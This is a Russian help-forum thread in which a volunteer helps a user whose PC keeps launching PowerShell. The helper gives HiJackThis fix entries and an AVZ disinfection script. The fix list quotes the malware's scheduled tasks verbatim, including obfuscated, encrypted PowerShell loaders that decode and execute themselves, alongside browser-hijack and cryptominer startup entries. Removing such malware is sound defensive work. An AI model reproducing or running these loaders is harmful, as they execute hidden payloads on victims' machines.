Сам по себе запускается Powershell

**hose70** · 31.05.2019, 13:24

Здравствуйте! Антивирус примерно каждый час выдаёт сообщение о том, что Powershell.exe пытается запуститься.

Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

**Info_bot** · 31.05.2019, 13:25

Уважаемый(ая) hose70, спасибо за обращение на наш форум!

Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

SQ · 01.06.2019, 06:13

Здравствуйте,

HiJackThis (из каталога autologger)профиксить
Важно: необходимо отметить и профиксить только то, что указано ниже.

Код:

R0 - HKCU\Software\Microsoft\Internet Explorer\Search: [Default_Search_URL] = http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWucbjwj6mzzJCvFnzQNsQi-tDrs6ZwVkBx30mL9z5fAQczffTgz0_jIHMFbCRwpcUbPpoXG8g27Hos8QOxNR7VDqEbYNplyCKx28y2noguQaWaf3LbkAVa91p0PGZtiXFsmX6BKZ53A3lxUIUZzfIMWerdg,,&q={searchTerms}
R1 - HKCU\Software\Microsoft\Internet Explorer\Main: [SearchAssistant] = http://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWucbjwj6mzzJCvFnzQNsQi-tDrs6ZwVkBx30mL9z5fAQczffTgz0_jIHMFbCRwpcUbPpoXG8g27Hos8QOxNR7VDqEbYNplyCKx28y2noguQaWaf3LbkAVa91p0PGZtiXFsmX6BKZ53A3lxUIUZzfIMWerdg,,&q={searchTerms}
O4 - MSConfig\startupreg: AceWebExtensionUpdater [command] = C:\Users\Клиент\AppData\Roaming\AceWebExtension\updater\ace_web_extension.exe (HKCU) (2015/12/18) (file missing)
O4 - MSConfig\startupreg: CMD [command] = C:\Windows\system32\cmd.exe /c start http://gangnamgame.org && exit (HKLM) (2015/12/18)
O4 - MSConfig\startupreg: GoogleUpdate [command] = C:\Users\Клиент\AppData\Local\Google\Profile\service.exe (HKCU) (2018/12/25) (file missing)
O4 - MSConfig\startupreg: IObit Malware Fighter [command] = C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe /autostart (HKLM) (2015/05/07) (file missing)
O4 - MSConfig\startupreg: Sound+ [command] = C:\Program Files\Sound+\Sound+.exe (HKLM) (2015/12/18) (file missing)
O4 - MSConfig\startupreg: ethminer [command] = C:\Users\Клиент\AppData\Roaming\cpuminer\ethminer\start.cmd (HKLM) (2015/12/18) (file missing)
O4 - MSConfig\startupreg: gmsd_ru_005010179 [command] = C:\Program Files (x86)\gmsd_ru_005010179\gmsd_ru_005010179.exe (HKLM) (2015/12/18) (file missing)
O4 - MSConfig\startupreg: gmsd_ru_005010180 [command] = C:\Program Files (x86)\gmsd_ru_005010180\gmsd_ru_005010180.exe (HKLM) (2015/12/20) (file missing)
O4 - MSConfig\startupreg: gmsd_ru_005010181 [command] = C:\Program Files (x86)\gmsd_ru_005010181\gmsd_ru_005010181.exe (HKLM) (2015/12/20) (file missing)
O4 - MSConfig\startupreg: gmsd_ru_021010179 [command] = C:\Program Files (x86)\gmsd_ru_021010179\gmsd_ru_021010179.exe (HKLM) (2015/12/18) (file missing)
O4 - MSConfig\startupreg: ospd_us_013010179 [command] = C:\Program Files (x86)\ospd_us_013010179\ospd_us_013010179.exe (HKLM) (2015/12/18) (file missing)
O4 - MSConfig\startupreg: plug [command] = C:\extension\update.exe (HKCU) (2014/06/20) (file missing)
O4 - MSConfig\startupreg: rec_en_77 [command] = C:\Program Files (x86)\rec_en_77\rec_en_77.exe (HKLM) (2015/12/18) (file missing)
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Закачать ВСЕ при помощи Download Master: (default) = (no file)
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Закачать при помощи Download Master: (default) = (no file)
O8 - Context menu item: HKCU\..\Internet Explorer\MenuExt\Передать на удаленную закачку DM: (default) = (no file)
O9-32 - Button: HKLM\..\{8DAE90AD-4583-4977-9DD4-4360F7A45C74}: (no name) - (no file)
O18 - HKLM\Software\Classes\Protocols\Handler\skype4com: [CLSID] = {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00avast: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\0YndCase0Sync: (no name) - {63D48440-63AB-44D0-B323-4731DFCDE9E9} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\0YndCase1Modified: (no name) - {7E7DC279-E6BE-4D57-9DEC-14FA0339DBC0} - (no file)
O21 - HKLM\..\ShellIconOverlayIdentifiers\0YndCase2Error: (no name) - {FB2FE984-05F5-4512-9D9B-69D3DE61F6D9} - (no file)
O22 - Task: (disabled) Uninstaller_SkipUac_Administrator - C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe /UninstallExplorer
O22 - Task: \Microsoft\Windows Live\SOXE\Extractor Definitions Update Task - {3519154C-227E-47F3-9CC9-12C3F05817F1} - (no file)
O22 - Task: \Microsoft\Windows\Active Directory Rights Management Services Client\Active Directory Rights Management Services Client - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c "$ddd = 'u322Uuh4sxrda9pX1FPAK788rQGMLL55nGDdHI4cyh+VB5YF1BKPT4gXngGOUdIUlBPCDsZFlUHAQogCxkS2C4EJlw6aSc5HrzawVO8ptwX6J8JqjwWbb71U8BOcdPE/pnHZCPZWzyCID4IZ0kLLV8VJyFHLGs9X0lHMVdlIx0eJW6YwghWPAZZOtQePSKwM/UbuAepxihTQMLdLlwWZb/gvrQGMOKc1mjrsSs1c2jGPFJUynwSTEpgEjl3eUp0IjwbGQ4lPqRCeFLwEngiPWd8VmlnfFNUZ7XvzCaIwiVupeP542ESKNdpi/TKNYux+hmfIDogIiROeXd4SiRDUM4kGjhWJd5MAmVjZFcYFmQDbTqYwghWPAZZOuA2VEJ4b60mxStlmlg3Pa/5t01Srb+9u5wfAOfJ0nznCRMtWzgTaM4MTjgWXTrQo1DOORpkFkTGYBp8EjkvfFI4T1SGeEKkFiBKUCIgMzGD5Ff550UmkI6NagAGcT/JC5wTAOLU4yDyJT4oRm0eRVpAUgwjYScYOnEihXZIQoUeeA9tMkgbbVc1R0h3fF8pdvAePS6kI8XDkHb85tAnjY+B9iEDJO7BK6BiBfOl8yCGWAstZkCuJFIgJlAenO5AGjginDsYFnhDVPJYAiAumXMcRlBOVANNTnlXRPZYI63zWSqVnkA6lUeBpkQilIadCo0jMYq04wT2EHchVhVSJUdpNlgXaU9Qc3gqQH8FG0gCSCtlagQaXFZgY3wyRT8ZC1RaQRMAUu3XvTb18jRT9MKInwQqSNPRpuE6YeewugSmJT4MIiQLHO6kZiRSfDdMpnxTUY5kGrgaMEp4SiD7BXL4RngePAdNEmgbSXd8bsVXnHPBjuBX5Zd9tgQmKfv5ztESOcPBijS+JVI9m3hWIIZ0FlBTHRIgGwUSIR4xZ2BHTIJ4VrgaIFpINiAPTTcBEmAbGQoka7zrYBP5gjBPOZelt3gmeM8Zu5xS1Nf91yDnDQ4EAnULTG58YkxSHRI9angWZFNQ/rxqOE54M0iCUCIsGiRKmXsEmiQ2WJJoa+iK/I+tmkA7qIqVmgBfVdP9t7AOcMc9om2DIS4964l6pFIgFmw2oBZwDnxLSEI4XjE26Ao8zmRCLCZMQnjWPFp4BlkrST9JHzXHqFMt7vA7pIqQhzEDQP/xjokKdKPVkgnvGSYMalg2TBtJA1w6VFN1DiEmBUYQNiB7ZFcY6rxqIEpgO1TKeHI9OvgyYCZ8A8XPWSqVBrSa1JMptkTOMafRp7kjMY7UqzHWQDoVBkFSITokQlgmOSN9H2EzIHdU/zD7GQ5RczFiSANVHmkbWAYpAykuAQpRUt33uCL8wizu8V6QomUC3bukq2hSaePJ2lXHBVcRay1jeAdpNnxHaV9Qc3hjHFt5f1C2YENYungmeBYlDqB+IEJ4N1TaTFJ4I+33lF7FZjBTocqUskRKNfrEj+zvZTLBKmnHLe4VLhFnUI5YPiQXSScYOnEjeTNUf2AzARctDgQaXFZgY3wnGRspChh+eCogM5HHzGetp3Q+wLuImlhWaaOl14A6POaw9yE/+X9JHyB3ULZsUkj3AWrAOlEjPBMxU0EPZCNUtmQ2cEpVK0l3fFohdnweYRtMyzG34BPp51zTocvkmoA6bdPlu5we1K6ZEvFKVCOZW2TKDFJ8T0kSVSdRH0kSTH95SlxbIHokqm1ucRNRY3xSIWaAViQumXMEs7HfqAPpQmBTsWfl6jA6fM8ZE5g6edO5ltS6Xcs5xzAOfVs4zjhKTDppP3hKJHdVf2BHAPKgYjxeeC9MtnhLVM54CqQeKE54a60mxStxmnAH5b6UshATTObt2tELDNe5iwS+JVI9ywRyVF7sVjg+oBZkOiAWZQMFAmgKRFJ5a2BHVM44GiSecAZUUxkaOB8BN7Tr7AvBsgF2perYsl06/fulV7BOYfvJijTyEWu5G2V20FZYMwQ==';iex('$'+'d=''Wm5WdVkzUnBiMjRnWkdWaktGdGllWFJsVzExZEpHTmlMQ0JiYzNSeWFXNW5YU1J3WVhOektYc2tjR0lnUFNCYlUzbHpkR1Z0TGxSbGVIUXVSVzVqYjJScGJtZGRPanBWVkVZNExrZGxkRUo1ZEdWektDUndZWE56S1Rza2N5QTlJQ1J3WWxzd1hUc2thajB3TzJadmNpZ2thU0E5SURBN0lDUnBJQzFzZENBa1kySXVRMjkxYm5RN0lDUnBLeXNwZTJsbUtDUnFJQzFuWlNBa2NHSXVRMjkxYm5RcGV5UnFQVEI5SUNSeklEMGdLREl6SUMxaVlXNWtJQ1J6SUMxaWIzSWdNVFV5S1NBdFluaHZjaUFrY3pza1kySmJKR2xkSUQwZ0pHTmlXeVJwWFNBdFluaHZjaUFrY0dKYkpHcGRJQzFpZUc5eUlDUnpPeVJxS3l0OWNtVjBkWEp1SUNSallqdDlKRzlpYWlBOUlHZDNiV2tnZDJsdU16SmZaR2x6YTJSeWFYWmxJSHdnZDJobGNtVWdleVJmTGtSbGRtbGpaVWxFSUMxbGNTQW5YRnd1WEZCSVdWTkpRMEZNUkZKSlZrVXdKMzBnZkNCelpXeGxZM1FnVFc5a1pXd3NJRk5sY21saGJHNTFiV0psY2pza1pDQTlJR1JsWXlBb1cxTjVjM1JsYlM1RGIyNTJaWEowWFRvNlJuSnZiVUpoYzJVMk5GTjBjbWx1Wnlna1pHUmtLU2tnS0NSdlltb3VUVzlrWld3Z0t5QW5JQ2NnS3lBa2IySnFMbE5sY21saGJHNTFiV0psY2lrN2FXVjRJQ2hwWlhnb0oxdFRlWE4wWlcwdVZHVjRkQzVGYm1OdlpHbHVaMTA2T2xWVVJqZ3VSMlYwSnlzblUzUnlhVzVuS0NSa0tTY3BLUT09'';for($z=2;$z--;){$'+'d=[Syst'+'em.Te'+'xt.Enco'+'ding]::U'+'TF'+4*2+'.Get'+'Str'+'ing([Sys'+'tem.Conv'+'ert]::From'+'Base6'+'4String($d))}$'+'d|i'+'ex;')"
O22 - Task: \Microsoft\Windows\Maintenance\WinNAT - C:\ProgramData\Windows\Profile\1.vbs (file missing)
O22 - Task: \Microsoft\Windows\Ras\Ras - C:\Program Files\Windows NT\Accessories\task.exe -Command "function dec([byte[]]$cb, [string]$pass){$pb = [System.Text.Encoding]::UTF8.GetBytes($pass);$s = $pb[0];$j=0;for($i = 0; $i -lt $cb.Count; $i++){if($j -ge $pb.Count){$j=0} $s = (23 -band $s -bor 152) -bxor $s;$cb[$i] = $cb[$i] -bxor $pb[$j] -bxor $s;$j++}return $cb;}$obj = gwmi win32_diskdrive | where {$_.DeviceID -eq '\\.\PHYSICALDRIVE0'} | select Model, Serialnumber;$d = dec ([System.Convert]::FromBase64String('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')) ($obj.Model + ' ' + $obj.Serialnumber);iex (iex('[System.Text.Encoding]::UTF8.Get'+'String($d)'))" (file missing)

AVZ выполнить следующий скрипт.
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.

Код:

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); 
 QuarantineFile('1.vbs','');
 QuarantineFile('C:\Users\Клиент\AppData\Roaming\WiseManager\WiseManager.exe','');
 QuarantineFile('C:\Program Files\Sound+\Sound+.exe','');
 QuarantineFile('C:\Program Files (x86)\rec_en_77\rec_en_77.exe','');
 QuarantineFile('C:\extension\update.exe','');
 QuarantineFile('C:\Program Files (x86)\ospd_us_013010179\ospd_us_013010179.exe','');
 QuarantineFile('C:\Program Files (x86)\IObit\IObit Malware Fighter\IMF.exe','');
 QuarantineFile('C:\Users\Клиент\AppData\Local\Google\Profile\service.exe','');
 QuarantineFile('C:\Program Files (x86)\gmsd_ru_021010179\gmsd_ru_021010179.exe','');
 QuarantineFile('C:\Program Files (x86)\gmsd_ru_005010181\gmsd_ru_005010181.exe','');
 QuarantineFile('C:\Program Files (x86)\gmsd_ru_005010180\gmsd_ru_005010180.exe','');
 QuarantineFile('C:\Program Files (x86)\gmsd_ru_005010179\gmsd_ru_005010179.exe','');
 QuarantineFile('C:\Users\Клиент\AppData\Roaming\cpuminer\ethminer\start.cmd','');
 QuarantineFile('C:\Program Files (x86)\BOINC\charityengine.exe','');
 QuarantineFile('C:\Program Files (x86)\BOINC\boinctray.exe','');
 QuarantineFile('C:\Users\Клиент\AppData\Roaming\AceWebExtension\updater\ace_web_extension.exe','');
 QuarantineFile('C:\Users\Клиент\AppData\Roaming\System\svchost.exe','');
 QuarantineFile('C:\Windows\system32\drivers\swsedrvr_vt_1_10_0_25.sys','');
 QuarantineFile('C:\Windows\system32\DRIVERS\voxaldriverx64.sys','');
 DeleteFile('C:\Users\Клиент\AppData\Roaming\System\svchost.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\AceWebExtensionUpdater','command');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\CMD','command');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\drm.exe','command');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ethminer','command');
 DeleteFile('C:\Users\Клиент\AppData\Roaming\cpuminer\ethminer\start.cmd','32');
 DeleteFile('C:\Program Files (x86)\gmsd_ru_005010179\gmsd_ru_005010179.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\gmsd_ru_005010179','command');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\gmsd_ru_005010180','command');
 DeleteFile('C:\Program Files (x86)\gmsd_ru_005010180\gmsd_ru_005010180.exe','32');
 DeleteFile('C:\Program Files (x86)\gmsd_ru_005010181\gmsd_ru_005010181.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\gmsd_ru_005010181','command');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\gmsd_ru_021010179','command');
 DeleteFile('C:\Program Files (x86)\gmsd_ru_021010179\gmsd_ru_021010179.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\GoogleUpdate','command');
 DeleteFile('C:\Users\Клиент\AppData\Local\Google\Profile\service.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\IObit Malware Fighter','command');
 DeleteFile('C:\Program Files (x86)\ospd_us_013010179\ospd_us_013010179.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\ospd_us_013010179','command');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\plug','command');
 DeleteFile('C:\Program Files (x86)\rec_en_77\rec_en_77.exe','32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\rec_en_77','command');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Sound+','command');
 DeleteFile('C:\Program Files\Sound+\Sound+.exe','32');
 DeleteFile('C:\Windows\system32\Tasks\Microsoft\Windows\Active Directory Rights Management Services Client\Active Directory Rights Management Services Client','64');
 DeleteFile('C:\Windows\system32\Tasks\Microsoft\Windows\Ras\Ras','64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Eventlog\Application\NSSM','EventMessageFile');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
 ExecuteRepair(3);
 ExecuteRepair(4);
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.

После выполнения скрипта компьютер перезагрузится.

После перезагрузки:
- Выполните в AVZ:

Код:

begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.

Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

- Подготовьте лог AdwCleaner и приложите его в теме.

**CyberHelper** · 01.06.2019, 06:23

=D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
=E5=F7=E5=ED=E8=FF:

=CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: 1
=CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: 1
=C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=
=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB =E2 =EA=E0=F0=E0=ED=F2=E8=ED=E0=F5 =ED=
=E5 =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB

Сам по себе запускается Powershell (заявка № 222888)

Опции темы